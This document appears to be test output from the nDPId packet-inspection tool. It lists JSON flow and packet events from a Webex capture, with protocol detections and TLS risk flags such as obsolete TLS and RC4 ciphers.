-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1444570694564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAoAytAABAGOZE+beWeCggAAQG7yn9kPvUvm8EK0VAS\/\/+1ggAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1444570694564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAo02pAAEAGOVEKCAABPm3lnsp\/AbubwQrRZD71MFAQOQh8ewAA"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699074,"flow_last_seen":1444570699074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699074,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1444570699074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699074,"pkt":"ABoRAAACABoRAAABCABFAAA8OjpAAEAGn3oKCAABNvEgDrSDAbvRQeFHAAAAAKACOQhpXwAAAgQFtAQCCAoATNt9AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1444570699077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoA2VAABAGBmQ28SAOCggAAQG7tIMuvh640UHhSFAS\/\/+YiwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1444570699077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoOjtAAEAGn40KCAABNvEgDrSDAbvRQeFILr4euVAQOQhfhAAA"} 
-00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699096,"flow_last_seen":1444570699096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699096,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1444570699096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699096,"pkt":"ABoRAAACABoRAAABCABFAAA8731AAEAGBawKCAABTi7tW+lsAFBr3TT9AAAAAKACOQhjAgAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1444570699101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAAoA2dAABAGIddOLu1bCggAAQBQ6WyUIssCa900\/lAS\/\/+AggAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1237,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699101,"flow_last_seen":1444570699101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699101,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1444570699101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAA8ZgxAAEAGjx0KCAABTi7tW+ltAFASyr2MAAAAAKACOQgzhQAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1444570699106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699106,"pkt":"ABoRAAACABoRAAABCABFAAAoA2hAABAGIdZOLu1bCggAAQBQ6W3tNUJzEsq9jVAS\/\/+AgQAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAo735AAEAGBb8KCAABTi7tW+lsAFBr3TT+lCLLA1AQOQhHewAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAoZg1AAEAGjzAKCAABTi7tW+ltAFASyr2N7TVCdFAQOQhHegAA"} 
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} 
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
-01349{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699916,"flow_last_seen":1444570699916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699916,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1444570699916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699916,"pkt":"ABoRAAACABoRAAABCABFAAA8M+lAAEAGPjwKCAABUEpuRIMPAbsBc+gmAAAAAKACOQj74QAAAgQFtAQCCAoATNvPAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1444570699917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoA3lAABAGnsBQSm5ECggAAQG7gw\/+jBfZAXPoJ1AS\/\/9icAAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1444570699917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoM+pAAEAGPk8KCAABUEpuRIMPAbsBc+gn\/owX2lAQOQgpaQAA"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700561,"flow_last_seen":1444570700561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1444570700561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700561,"pkt":"ABoRAAACABoRAAABCABFAAA8d7ZAAEAG+m4KCAABUEpuRIMRAbsN6aumAAAAAKACOQgrqQAAAgQFtAQCCAoATNwQAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1444570700563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAAoA4lAABAGnrBQSm5ECggAAQG7gxHyFlRZDemrp1AS\/\/9ibgAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1304,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700563,"flow_last_seen":1444570700563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700563,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1444570700563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAA8CyVAAEAGZwAKCAABUEpuRIMSAbsmf9c3AAAAAKACOQjnfgAAAgQFtAQCCAoATNwSAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoA4pAABAGnq9QSm5ECggAAQG7gxLZgCjIJn\/XOFAS\/\/9ibQAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAod7dAAEAG+oEKCAABUEpuRIMRAbsN6aun8hZUWlAQOQgpZwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoCyZAAEAGZxMKCAABUEpuRIMSAbsmf9c42YAoyVAQOQgpZgAA"} 
-00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570712008,"flow_last_seen":1444570712008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570712008,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 